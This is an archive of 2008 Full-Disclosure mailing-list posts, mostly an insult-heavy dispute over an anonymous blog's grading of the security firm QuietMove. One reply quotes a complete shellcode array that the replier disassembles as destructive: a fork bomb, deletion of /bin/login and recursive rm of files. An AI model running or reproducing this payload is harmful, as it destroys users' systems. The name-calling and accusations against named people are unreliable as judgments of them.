For one of the companies that I worked for in the past, we had a special way of analyzing new products/services. In our assessments, we would gather up all of the good points of the best vendors -- instead of focusing on the bad points of vendors that failed our criteria.

It takes a special kind of asshole to do what you do. I also believe that you know this, and only by hiding behind anonymity are you willing to continue to do what it is that you do.

As far as losing credibility with you, I'm clearly fine with that... I'll be getting plenty of free beer from others who dislike you. Maybe your nepotism will pay off with the companies you give good grades to. Maybe you'll win a Nobel Prize for your amazing methodology of rating security consulting companies by their websites, as well as the scientific method (i.e. using Google to search mailing-lists for people's names).
Cheers,
Andre

From hijacker at oldum.net Wed Jan 2 12:40:11 2008
From: hijacker at oldum.net (Nikolay Kichukov)
Date: Wed, 02 Jan 2008 14:40:11 +0200
Subject: [Full-disclosure] here
In-Reply-To: <421EB9F4-9840-49D5-8DE4-0A3A40EED8D2@gmail.com>
References: <61dea3e30712201851i32064080s2dec5588730f70e9@mail.gmail.com> <421EB9F4-9840-49D5-8DE4-0A3A40EED8D2@gmail.com>
Message-ID: <477B862B.6040808@oldum.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Thanks Andrew! Nice catch! ;-)

Cheers,
- -Nikolay

Andrew Farmer wrote:
> On 20 Dec 07, at 18:51, onion ring wrote:
>
>> char sc[] =
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x31\xC0\x89\xC3\x89\xC1\x41\xB0\x30\xCD\x80\x31\xC0\xFE\xC3\x80"
>> "\xFB\x1F\x72\xF3\x04\x40\xCD\x80\x89\xC2\x31\xC0\xB0\x02\xCD\x80"
>> "\x39\xC0\x74\x08\x31\xC0\x89\xC3\xB0\x01\xCD\x80\x31\xC0\xB0\x42"
>> "\xCD\x80\x43\x39\xDA\x74\x08\x89\xD3\x31\xC0\x04\x25\xCD\x80\x31"
>> "\xC0\x50\x68\x6F\x67\x69\x6E\x68\x69\x6E\x2F\x6C\x68\x2F\x2F\x2F"
>> "\x62\x89\xE3\x31\xC0\x04\x0A\xCD\x80\x31\xC0\x50\x68\x2A\x2F\x2F"
>> "\x2F\x89\xE2\x50\x68\x2D\x72\x66\x66\x89\xE1\x50\x68\x6E\x2F\x72"
>> "\x6D\x68\x2F\x2F\x62\x69\x89\xE3\x50\x52\x51\x53\x89\xE1\x31\xD2"
>> "\x04\x0B\xCD\x80";
>
>
> Abbreviated disassembly:
> signal(SIGHUP, SIG_IGN)
> something that looks like a 15-level deep fork() bomb
> something involving kill()
> unlink("/bin/login")
> execve("//bin/rm", {"//bin/rm", "-rff", "*///"})
>
> You could at least try to obfuscate your constants a little better.
> That was way too easy.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQEVAwUBR3uGKzFLYVOGGjgXAQLqzwgAo4UyRGOIGKt2rHK32x17Imt5axyJIHQF
+sIq8NsJzw5U5psM63MrxIkKajW2c/THOUIbFR4TaFAt1/ng3covsJHh1iX6bpfN
uD18QTY3FHPIv9LNXoYgtJmLiUBFqY1AWXd5ih1e/LMRa9ZP8KVjv14EnmJom8tP
qL/WEtYjq60reaLpLpowhVLi4q1KKjvC4BoRz7zGmp26As6ah/5HmYpjpsiA7cKg
v7959l4bQsy0QHG6YP+pY8PfQX3KmhFns1yAsQF93TMGx3N8LYa1fdcXkZLrw5nf
L8tI3QZ+Qhu4lck+QzElCtD3sUuB4z/ae+KsJWWJuGoDe7CdrR5Yug==
=bBbH
-----END PGP SIGNATURE-----

From adam.muntner at quietmove.com Wed Jan 2 14:32:42 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Wed, 2 Jan 2008 09:32:42 -0500
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
Message-ID: <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>

Andre is a friend but not an employee or representative of the business - HOWEVER - there were a number of inaccuracies in his statements about me. A selection of corrections to statements is below.

- I never ran UPT

- all the speculation about our methodology and pricing was wrong.

- the quantity of automated vs hands-on testing we perform is based on what the customer is willing to pay for. Novel concept. We explain carefully what can and can't be found. The customer selects their appropriate level of risk acceptance based on the value of the target of evaluation and their budget. We always try to go above and beyond.

- our overhead is low - no giant headquarters - we are virtual mostly except for a rack cage. We don't have to support a giant marketing team and don't do $20k trade show booths. As a result that isn't built into our pricing.
- I was never a 'uNIX admin' but did engineer one of the early commercially avail Beowulf clusters - in 1998 - and have run some unix boxes, meaning it took all of 3 hours a month of my time, but i was not a 'unix admin' by any stretch of the imagination. The OpenBSD posts were from what, 10 years ago? More evidence of your poor arithmetic skills from the initial post.

- the website wasn't updated because I am taking a vacation to NYC and would rather enjoy myself than meet some 12 hour unmentioned timetable to edit the website by an anonymous coward pfy.

- they weren't insults, they were sarcastic though accurate representations of your subpar (at best) review capabilities

- others, but really, who cares? You are not interested in facts as I will prove below. Your analysis is worthless.

Several weeks ago you posted your alleged methodology. It included contacting the vendor PRIOR to review, which you didn't do. You also didn't notify us of the review. I read it on fd myself. You sent a list of questions on new years day, after you posted the review, and half a day later posted your re-review without again contacting me directly except with a monster list of questions - not so much as a phone call. Your alleged review was based on list noise, not speaking with me. You still have yet to post your scoring methodology as promised. You fail.

Frankly I find the drama and anonymous weenie-waving on this list to be tedious. FD is more a running joke than a productive mailing list. Save the drama fo yo mama.

On my timetable I'll respond to your questions.... To the list, not to you directly. Frankly I don't trust you to represent them accurately. Right now I'm going to visit the metropolitan museum of art, and tonight go party - not answer your essay test. Sorry to disappoint. As a number of list members commented privately to me - you don't deserve the attention.
That said, if you can prove you will follow your own previously stated methodology, I'll re-review your review system. Following your methodology I will post a f----------- score in 6-12 hours or maybe sooner if you don't respond. That's a joke, son. ;)

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sorry for typos - sent from my 31337 jailbroken iPhone. It runs unix. I guess that makes me a unix admin!

On Jan 2, 2008, at 2:17 AM, secreview wrote:
> [...]

From adam.muntner at quietmove.com Wed Jan 2 14:45:37 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Wed, 2 Jan 2008 09:45:37 -0500
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com> <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
Message-ID: <616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com>

Just to be clear, the corrections to secreview, reepex and Andre were intermingled. The ones I mentioned were the ones secreview and reepex, the anonymous cowards too embarrassed by their own ignorant commentary to stand behind them, called out.
Dre, thx for pointing out the ha.ckers.org posts. More evidence of secreview's selective quotation and/or ability to 'research'. He can't even spell the name of the company he reviews correctly. Secreview re-re-score: f---------------------------------------------------------------. :) Ho hum!

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sent from my iPhone

On Jan 2, 2008, at 9:32 AM, Adam Muntner wrote:

> Andre is a friend but not an employee or representative of the business - HOWEVER - there were a number of inaccuracies in his statements about me. A selection of corrections to statements are below.
>
> - I never ran UPT
> - all the speculation about our methodology and pricing was wrong.
> - the quantity of automated vs hands-on testing we perform is based on what the customer is willing to pay for. Novel concept. We explain carefully what can and can't be found. The customer selects their appropriate level of risk acceptance based on the value of the target of evaluation and their budget. We always try to go above and beyond.
> - our overhead is low - no giant headquarters - we are mostly virtual except for a rack cage. We don't have to support a giant marketing team and don't do $20k trade show booths. As a result that isn't built into our pricing.
> - I was never a 'Unix admin' but did engineer one of the early commercially available Beowulf clusters - in 1998 - and have run some Unix boxes, meaning it took all of 3 hours a month of my time, but I was not a 'Unix admin' by any stretch of the imagination. The OpenBSD posts were from what, 10 years ago? More evidence of your poor arithmetic skills from the initial post.
> - the website wasn't updated because I am taking a vacation to NYC and would rather enjoy myself than meet some 12 hour unmentioned timetable to edit the website by an anonymous coward pfy.
> - they weren't insults, they were sarcastic though accurate representations of your subpar (at best) review capabilities
> - others but really, who cares? You are not interested in facts as I will prove below.
>
> Your analysis is worthless. Several weeks ago you posted your alleged methodology. It included contacting the vendor PRIOR to review, which you didn't do. You also didn't notify us of the review. I read it on FD myself.
>
> You sent a list of questions on New Year's Day, after you posted the review, and half a day later posted your re-review without again contacting me directly except with a monster list of questions - not so much as a phone call. Your alleged review was based on list noise, not speaking with me.
>
> You still have yet to post your scoring methodology as promised. You fail.
>
> Frankly I find the drama and anonymous weenie-waving on this list to be tedious. FD is more a running joke than a productive mailing list. Save the drama fo yo mama.
>
> On my timetable I'll respond to your questions.... To the list, not to you directly. Frankly I don't trust you to represent them accurately. Right now I'm going to visit the Metropolitan Museum of Art, and tonight go party - not answer your essay test. Sorry to disappoint.
>
> As a number of list members commented privately to me - you don't deserve the attention.
>
> That said, if you can prove you will follow your own previously stated methodology, I'll re-review your review system. Following your methodology I will post a f----------- score in 6-12 hours or maybe sooner if you don't respond.
>
> That's a joke, son. ;)
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> http://www.quietmove.com
>
> Sorry for typos - sent from my 31337 jailbroken iPhone. It runs unix. I guess that makes me a unix admin!
>
> On Jan 2, 2008, at 2:17 AM, secreview wrote:
>
>> Our first QuietMove review can be found here.
>>
>> QuietMove, located at http://www.quietmove.com is a Professional IT Security Services company that was founded by Adam Muntner, Jeffrey Rassas and James G. (Jim) Garvey, Jr. We've already performed one review of QuietMove but Adam Munter and his team didn't like the review. As a result, we've gone back and revisited our data and are producing this second, hopefully more accurate review.
>>
>> Our first point of criticism is still the QuietMove web-site. Their services are poorly defined, and even somewhat contradictory. For example, under their Penetration Testing section they nearly bash the use of Automated tools. Shortly thereafter they go on to say that they offer services for nearly the same cost as "cookie-cutter" services.
>>
>> Well, we still have a problem with that. The overhead cost of using quality talent is always going to be far greater than the fees charged by vendors that sell automated scanning software. Any time someone tells us that they can offer "expert driven" services at the same price points or even nearly the same as a "cookie cutter" service, we say bullshit.
>>
>> Taking it a step further, we still stick by our previous opinion that the QuietMove website doesn't have much to offer prospective customers in the way of useful information. The services shown are very poorly defined; the grammar is still horrible, and frankly the website is incomplete. Want to see what we mean? Click on their "Social Engineering" tab under their service offerings; you'll notice that there is no description. We hope that their web site does not reflect the quality of their services.
>>
>> When Adam Muntner read our previous post where we commented on the QuietMove Website he responded in a reactive, emotional, and unprofessional manner. You can read his response to our first post here, insults and all. Unfortunately for Adam, his unprofessional attitude hurt QuietMove during this second review.
>>
>> Regardless, Adam did react to our website comments, and his reaction was as follows, verbatim:
>>
>> "Most of our clients are referred by others who are very satisfied with the work we perform. Not by the website. It doesn't get a lot of attention - were small but growing and focused on serving our clients. I know basic HTML seems like the pinnacle of achievement to you, but we aren't in the business of making pretty web pages. We discuss our methodology with our clients-we don't post it on the web. I know you were hoping to learn nimething. Hacking for dummies might be more your speed, after you perfect your Cunt and Paste skills."
>>
>> During this second round of review, we were able to locate more information about Adam. We found several posts that Adam made to different mailing lists about FreeBSD, OpenBSD, Systems Administration, etc. We also found a rather nice PowerPoint presentation that Adam created that clearly defined specific security services. So we know that Adam is not an idiot, but we don't know if he's actually a security guru. We're also wondering why Adam doesn't create the same quality content for his QuietMove website as he did for his presentation.
>>
>> In tandem with Adam's response to our initial review of QuietMove, Adam also had other friends and associates respond. One of those people was Andre Gironda who had a lot of great things to say about QuietMove, but also made the unfortunate mistake of tainting his credibility as a professional by directly attacking other vendors.
>>
>> Andre Gironda asked us who we are in one of his emails. He also indirectly accused us of exacting vengeance on QuietMove by performing a review. While we've never been accused of this before by any of our other review subjects, we feel that we should state for the record that this is not some sort of vengeance play.
>>
>> Andre Gironda also said that he can vouch for Adam's 14 years of experience "and then some". Apparently when Andre met Adam of QuietMove, Adam was working as a Unix Security Administrator for Unphamiliar Territories (UPT), "a vulnerability research BBS that ran from 1989 - 1996". Also according to Andre Gironda, "It was a prominent place for information about vulnerability research. Many held it in higher regard than Phrack magazine or any leading website/magazine during that time period."
>>
>> Sorry Andre, but we don't agree with your statement about UPT. Even more importantly, we're not sure how Adam's experience as a Unix Security administrator (aka systems admin) will help him offer professional IT Security Services. Adam needs to be able to protect his clients from real world hackers, not from failed tape backups and disk crashes.
>>
>> Andre went on to say that many "small businesses such as QuietMove have a hard enough time staying alive in this industry." He said "I suggest you pick on someone your own size even if you have a legitimate problem with QuietMove or Adam." Our response is that we have no problem with Adam or QuietMove. We found QuietMove by doing a google search for Penetration Testing.
>>
>> In a different email Andre lost all credibility with us because he decided to directly attack other companies that we've reviewed that received higher grades. If you compare the score cards between QuietMove and the other company that Andre bashes, you'll see why they got the good grade. Anyway, here's what Andre had to say (we'll comment later):
>>
>> "Look, you rated Denim Group as A-. You must either work there - or know the guys. Dan Cornell is a moron compared to Adam Muntner - and his code is certainly worse (e.g. Sprajax).
>>
>> Adam and team know Burp Suite, use manual web application testing - in addition to traditional dynamic and static analysis.
>>
>> I have seen Adam and crew using Fortify Software's SCA and Tracer tools. I have seen them using Hailstorm ARC and modifying the Javascript included in the SmartAttack library. I would call this a best-of-breed security testing methodology.
>>
>> I have worked for many small companies myself who do not use ANY automated testing, including both open-source and commercial tools. I think this is stupid... and spent most of my time writing `for' loops in shell just to get around their limitation on "not writing scripts to automate things".
>>
>> I have also worked for small companies that "only" use scripting languages, or only use "the best" scripting language (usually Ruby, Python, or Perl) and write all their own automated tools. This is also stupid -- especially when existing toolsets have lots of great capability -- it's like re-inventing the wheel.
>>
>> Of course there are places that "only use" commercial automated tools, but I haven't actually met one yet. When I do -- I'll go ahead and post an obnoxious review about them. More people will read mine than anything you do -- and with my name on it -- they are certainly bound to take it a lot more seriously."
>>
>> Andre lost all credibility with our team when he insulted the Denim Group. We contacted the Denim Group and spoke directly with one of their founders when we did their review. Not only were we very impressed with them, but they provided us with great detail about their testing methodologies and service capabilities. Adam, Andre and the rest of the QuietMove team haven't provided us with anything tangible yet, and we've asked. When we tried to contact them the first time we couldn't get hold of them, same for the second.
>>
>> We're still waiting to hear back from Adam at QuietMove with answers to our questions about the QuietMove services. If we hear back, we'll modify this blog entry yet again to properly reflect what we feel is the truth. We'd also like to make the professional suggestion that QuietMove think about their professional image before they respond to anyone in a public forum. Not only does their reaction not look good but it could make prospective customers turn away.
>>
>> Lastly, with respect to our comment about Marcin Wielgoszewski, a QuietMove consultant, being "Green", he confirmed that for us in an email. He wrote "You're right. I'm new and young and I'll be the first to admit it. We can't all be born security gurus, and I'm not trying to hide that, but me aside... what have you done besides hide behind your gmail account and troll FD? Thanks for pointing out those two pages, two pages out of 100's that were posted a long time ago and yes, are very out of date."
>>
>> All in all, it is still our professional opinion that QuietMove doesn't have significant "strong" human talent behind their services. They appear to be a very small company run by someone that is not a "hacker" by nature but instead is a systems administrator or your advanced IT guy with a good understanding of Web Application Security. If you are looking to truly defend yourselves against malicious hackers then we suggest finding a different provider.
>>
>> Note: If we receive any information back from QuietMove, other than what we've received in emotional reactions, then we'll consider adding that information to this review. If QuietMove can provide us with proof of capability then we will accurately reflect that capability here. We're not in the business of bashing anyone even if they bash us or disrespect us. We are in the business of exposing Professional IT Security Service providers for what they really are to the best of our ability.
>>
>> If you feel that QuietMove deserves a better grade and can provide us with legitimate reasons as to why, then please comment and we'll consider it. (Even after all of their insults.)
>>
>> Score Card
>>
>> --
>> Posted By secreview to Professional IT Security Providers - Exposed at 1/01/2008 10:38:00 PM

From slash.pd at gmail.com Wed Jan 2 15:08:56 2008
From: slash.pd at gmail.com (Peter Dawson)
Date: Wed, 2 Jan 2008 10:08:56 -0500
Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)
In-Reply-To: <8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com> <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com> <616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com> <8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
Message-ID: <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>

Adam

I don't recall Rsnake or id posting a review on secreview. Is there a link you could share?
tia

/pd

On Jan 2, 2008 9:45 AM, Adam Muntner <adam.muntner at quietmove.com> wrote:
> Dre thx for pointing out the ha.ckers.org posts. More evidence of secreview selective quotation and/or ability to 'research'
From adam.muntner at quietmove.com Wed Jan 2 15:26:17 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Wed, 2 Jan 2008 10:26:17 -0500
Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)
In-Reply-To: <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com> <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com> <616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com> <8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com> <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
Message-ID:

It was a reply to the Larry Suto review of web app scanners rsnake posted. I commented on his blog post. The review was totally worthless.

Adam Muntner
Managing Partner
QuietMove, Inc.
Phone: 602-793-5969
Fax: 866-272-8194
http://www.quietmove.com

Sent from my iPhone

On Jan 2, 2008, at 10:08 AM, "Peter Dawson" wrote:

> Adam
>
> I don't recall Rsnake or id posting a review on secreview. Is there a link you could share?
> tia
>
> /pd
>
> On Jan 2, 2008 9:45 AM, Adam Muntner <adam.muntner at quietmove.com> wrote:
> > Dre thx for pointing out the ha.ckers.org posts. More evidence of secreview selective quotation and/or ability to 'research'

From mukul.dharwadkar at gmail.com Wed Jan 2 15:41:42 2008
From: mukul.dharwadkar at gmail.com (Mukul Dharwadkar)
Date: Wed, 2 Jan 2008 09:41:42 -0600
Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)
In-Reply-To:
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com> <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com> <616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com> <8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com> <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
Message-ID:

With all due respect Adam, you would not have responded to these posts at all if you thought these reviews were worthless.

On 1/2/08, Adam Muntner wrote:
> It was a reply to the Larry Suto review of web app scanners rsnake posted. I commented on his blog post. The review was totally worthless.
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> Phone: 602-793-5969
> Fax: 866-272-8194
> http://www.quietmove.com
>
> Sent from my iPhone
>
> On Jan 2, 2008, at 10:08 AM, "Peter Dawson" wrote:
>
> > Adam
> >
> > I don't recall Rsnake or id posting a review on secreview. Is there a link you could share?
> > tia
> >
> > /pd
> >
> > On Jan 2, 2008 9:45 AM, Adam Muntner <adam.muntner at quietmove.com> wrote:
> > > Dre thx for pointing out the ha.ckers.org posts. More evidence of secreview selective quotation and/or ability to 'research'

--
Smile!!! :) It improves your face value...
Visit me at http://www.dharwadkar.com http://www.dharwadkar.org
Sister Site: http://www.saraswatibhuvan.org

From secreview at hushmail.com Wed Jan 2 18:08:13 2008
From: secreview at hushmail.com (SecReview)
Date: Wed, 02 Jan 2008 13:08:13 -0500
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
Message-ID: <20080102180813.C5B5050038@mailserver9.hushmail.com>

Hi Adam,

We've said this before and will say this again, this time to everyone. We would be more than happy to give your company (QuietMove) a "better" review if you'd enable us to do that. So far you haven't helped us to effectively review you at all. We tried to call you before our initial review, but never got hold of anyone. We also sent you an email before writing our second review, and you never responded to any of the questions in that email. If you'd like us to do a better review then provide us with the information that you think we will need to get the job done.

Our current review is the product of your website, emails that you've posted to this and other forums, and your reaction to our first review. We haven't been able to find anything related to major accomplishments by you or by QuietMove, we haven't seen any sample reports, and we haven't received any answers to any questions about your methodologies for service execution and delivery. We even think that our current review might be too harsh, but can't change anything without more information.

If you want us to change our review, we can do that again and we can do it in a non-biased way (regardless of all the rants and noise). We need you to tell us about your service delivery methodologies, your reporting methodologies, how you define specific service offerings, what markets you play in, and if possible sanitized sample reports. We won't publish any of that information directly, but we would use that to produce your next review. We want our reviews to accurately and truthfully reflect the quality and professionalism of the providers that we study. (In fact, if anyone has any suggestions as to how we could better "rank" security companies we'd be more than happy to listen and consider those suggestions.)

Hope this helps. This will be our last email about QuietMove unless you request a redo of the current review. We will only redo the review if you are able to provide us with accurate information to help us get it done. We think that you should do it, because we think that you can score much better than an F+. (You're clearly not an idiot and you do have at least some experience.)

-the end.

Regards,
The Secreview Team
http://secreview.blogspot.com
Professional IT Security Service Providers - Exposed

From Valdis.Kletnieks at vt.edu Wed Jan 2 18:39:21 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 02 Jan 2008 13:39:21 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: Your message of "Tue, 01 Jan 2008 12:33:36 CST."
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID: <22264.1199299161@turing-police.cc.vt.edu>

On Tue, 01 Jan 2008 12:33:36 CST, reepex said:
> Is this list up to date? It makes it seem as if you are learning basic linux commands, sed, and basic perl. Also why are you reading operating system design and implementation when you do not know C?
C is not a prerequisite for understanding operating systems design. It's only needed if the particular operating system you're working with implements its internals in C. What is more important is understanding the *concepts* - things like locking, and race conditions, and how fine-grained locking you need/want for a filesystem. Having one big lock is a lot easier, but causes contention - having a lot of little locks can cause deadlocks, especially in error handlers. What does the filesystem code do if (for example) it gets 2/3 of the way through the rename of a file, and encounters an I/O error while writing out the removal of the old name of the file? What are the trade-offs required for an operating system to support jitter-free multimedia applications (the first thing to learn is that throughput, latency, and jitter are intertwined, and it's very difficult to do all 3 well at the same time)?

It's also important to understand that there are approaches other than Windows and Unix/Linux - IBM's VM and MVS systems have been around for a long time, and have a lot to tell us about other choices that can be made. There's still a lot of VMS running out there in scattered corners as well - and that system had a lot of concepts that one should understand, at least well enough to know why "my favorite system didn't do it that way because..." (Hint - consider how and why SYS$FOO variables worked in VMS, and why they're so hard to get working correctly under Linux - they're *not* exactly the same as Unix/Linux environment variables, and as such provide both problems and solutions that environment variables don't). Bonus points for knowing that VMS was mostly written in Bliss/32 or some such, and VM and MVS were a mixture of assembler and (later on) PL/S. No C knowledge needed for those critters...

Even when the system *is* written in C, you don't need to be a C guru to understand what's going on. Maurice Bach's "The Design of the Unix Operating System" is probably one of the classic texts - but you don't need to know C any better than "read C code snippet as pseudocode" to follow it.

From randy at procyonlabs.com Wed Jan 2 19:13:48 2008
From: randy at procyonlabs.com (Randal T. Rioux)
Date: Wed, 02 Jan 2008 14:13:48 -0500
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
Message-ID: <452214.1315441199301228241.JavaMail.servlet@perfora>

>Valdis.Kletnieks at vt.edu said:
>Bonus points for knowing that VMS was mostly written in Bliss/32 or some such, and VM and MVS were a mixture of assembler and (later on) PL/S. No C knowledge needed for those critters...

OpenVMS is less than 40% Blissful... though I'm not familiar with the original source (wasn't it written on stone tablets?). About 50% is C, with a healthy mix of obsoletes making the difference. How something so elegant could be spawned from such chaos is beyond me. Mostly, the VMS basic OS utilities are Bliss-based (think: GNU).

I really wish HP would open OpenVMS before they kill it.

Security relevance: UNHACKABLE!
Randy From william at lefkovics.net Wed Jan 2 18:57:35 2008 From: william at lefkovics.net (William Lefkovics) Date: Wed, 2 Jan 2008 10:57:35 -0800 Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---) In-Reply-To: References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com> <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com> <616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com> <8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com> <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com> Message-ID: <011b01c84d71$56a2c450$03e84cf0$@net> Anonymous reviews by people who have not used the services of the company they are reviewing aren't worth the virtual paper they are written on. (even the name on the site indicates the goal of companies 'exposed' not 'reviewed'.) I am no security expert and would depend on using an external company for certain security services. All I have gained from this discussion is to completely ignore secreview content in making any determination of companies to call upon for things like penetration testing. I don't know you from . well. Adam. Your concern is probably that actual potential clients may read such content and not realize it is drivel. How about a blog post or something commenting that 'don't be fooled by company reviews by people who have never tried our services.'? Just curious. From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Adam Muntner Sent: Wednesday, January 02, 2008 7:26 AM To: Peter Dawson Cc: Full-Disclosure dis Subject: Re: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---) It was a reply to the larry suto review of web app scanners rsnake posted. I commented on his blog post. The review was totally worthless. Adam Muntner Managing Partner QuietMove, Inc. 
Phone: 602-793-5969 Fax: 866-272-8194 http://www.quietmove.com Sent from my iPhone On Jan 2, 2008, at 10:08 AM, "Peter Dawson" wrote: Adam I don't recall Rsnake or id posting a review on secreview. Is there a link you could share ? tia /pd On Jan 2, 2008 9:45 AM, Adam Muntner < adam.muntner at quietmove.com> wrote: Dre thx for pointing out the ha.ckers.org posts. More evidence of secreview selective quotation and/or ability to 'research' _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/b4d51174/attachment.html From reepex at gmail.com Wed Jan 2 19:31:46 2008 From: reepex at gmail.com (reepex) Date: Wed, 2 Jan 2008 13:31:46 -0600 Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - ) In-Reply-To: <2fd9390e0801012202q25c768f6w579df2488d6e2d39@mail.gmail.com> References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com> <2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com> <2fd9390e0801012202q25c768f6w579df2488d6e2d39@mail.gmail.com> Message-ID: everyone who is not a kiddie knows rsnake is a joke, just like anyone else involved in his *.ackers group. If rsnake was to post to places like this instead of lamer 'hacker'/'security' magazines then he would be ridiculed off the list like pdp architect was. Instead I believe rsnake knows hes a kiddie so he sticks to places with non-technical people and does not involve himself with people who actually know what they are talking about. 
I picked on Adam Munter mostly because his lame intern decided to spout up on the list only to end up being a kiddie, and also Adam brought it upon himself by putting any worth into what secreview says and replying to their review.

On Jan 2, 2008 12:02 AM, Andre Gironda wrote:
> On Jan 1, 2008 9:51 PM, reepex wrote:
> > ok so they are nothing alike because ptp/hts actually teach you stuff while "UPT" was for jokes... so your post was stupid
>
> The joke's on you since you don't have the context.
>
> > I am not a part of secreview but I realize following email threads is very complicated for you.
>
> It's not complicated. I simply just don't care about who you are as it relates to the thread. You appear to be attacking the person/people I'm defending, while at the same time defending the secreview post.
>
> > So you list 5 tools they use then mention they modify a javascript library... So basically they use automated tools and are former web developers ... sound pretty hardcore
>
> Javascript is more than just a language for web developers, especially when utilized in the Hailstorm SmartAttack library, which isn't a Javascript library. These are completely different concepts. It should also be noted that both Burp Suite and Hailstorm ARC can be used in manual and hybrid modes... with step-modes and form-trainers. They can modify their traversals and have tons of extra customization on top of what other offerings provide... and can customize the underlying "data-driven" attacks.
>
> Certainly you've read some of Adam Muntner's comments on, say, ha.ckers.org and other places?
>
> Allow me to pick on someone in the industry for a second: RSnake.
>
> RSnake has an advertisement up on his website that asks, "Which web application scanner can hack it?" "Check the Oct 15 post for study results:"
>
> http://ha.ckers.org/blog/20071014/web-application-scanning-depth-statistics/
>
> Most idiots will only read what RSnake / Larry Suto have written, and will completely miss the comments by Adam Muntner. Adam not only eloquently puts down the testing techniques by Larry Suto, but also makes mention about proper customization of tools and testing outside of the commercial scanners.
>
> Effectively, Adam Muntner is one of the only people that does understand this problem that you specifically say that he does not, and that the secreview challenge seems to care about most of all other points.
>
> Where was reepex, where was secreview when RSnake and Larry Suto blundered our industry into submission? Why pick on a hero like Adam Muntner instead? What are you getting out of it?
>
> Worse - RSnake hasn't been called out on this yet - but he has good reason to promote Larry's paper. In fact, it may even be a monetary reason. In an article for INSECURE Magazine, they interview RSnake (page 30):
> http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf
>
> Question: What web application scanners do you use?
>
> RSnake: [...] my favorite tools in my arsenal (including the manual ones) are: Burp Suite, THC Hydra, fierce, Nessus, Nikto, nmap, NTOSpider (commercial), httprint, Cain, sn00per, Absynthe, Sqlninja, a half dozen Firefox plugins like Webdeveloper, JSView, NoScript, Greasemonkey etc... and the entire suite of unix utils out there, like wget, telnet, ncftp, etc.
>
> Notice the only commercial tool listed is NTOSpider. Coincidence?
